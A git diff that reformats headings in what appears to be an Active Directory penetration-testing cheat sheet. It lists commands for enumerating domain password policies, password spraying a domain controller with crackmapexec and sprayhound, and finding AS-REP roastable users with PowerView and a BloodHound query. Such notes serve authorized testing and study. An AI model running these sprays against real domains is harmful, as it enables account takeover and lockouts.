--- a/03. Username - no pwd.md
+++ b/03. Username - no pwd.md
@@ -1,7 +1,7 @@
-### Username - no password  
+# Username - no password  
   
-🔥Password spray  
-Get password policy (need creds, but you should get the policy before starting a spray)  
+## 🔥Password spray  
+## Get password policy (need creds, but you should get the policy before starting a spray)  
 	cme <IP> -u 'user' -p 'password' --pass-pol  
 	enum4linx -u 'username' -p 'password' -P <IP>  
 	Get-ADDefaultDomainPasswordPolicy  
@@ -9,13 +9,14 @@ Get password policy (need creds, but you should get the policy before starting a
 		 Get-ADFineGrainedPasswordPolicy -filter *  
 		Get-ADUserResultantPasswordPolicy -Identity <user>  
 		ldapsearch-ad.py --server '<dc>' -d <domain> -u <user> -p <pass> --type pass-pols  
-cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce # test user=password  
-cme smb <dc-ip> -u user.txt -p password.txt # multiple test (carrefull of lock policy)  
+
+cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce ## test user=password  
+cme smb <dc-ip> -u user.txt -p password.txt ## multiple test (carrefull of lock policy)  
 sprayhound -U <users.txt> -d <domain> -dc <dcip>  
   
 	  
 	  
-ASREPRoast  
+## ASREPRoast  
 Get ASREPRoastable users (need creds)  
 	Get-DomainUser -PreauthNotRequired -Properties SamAccountName  
 	MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p  
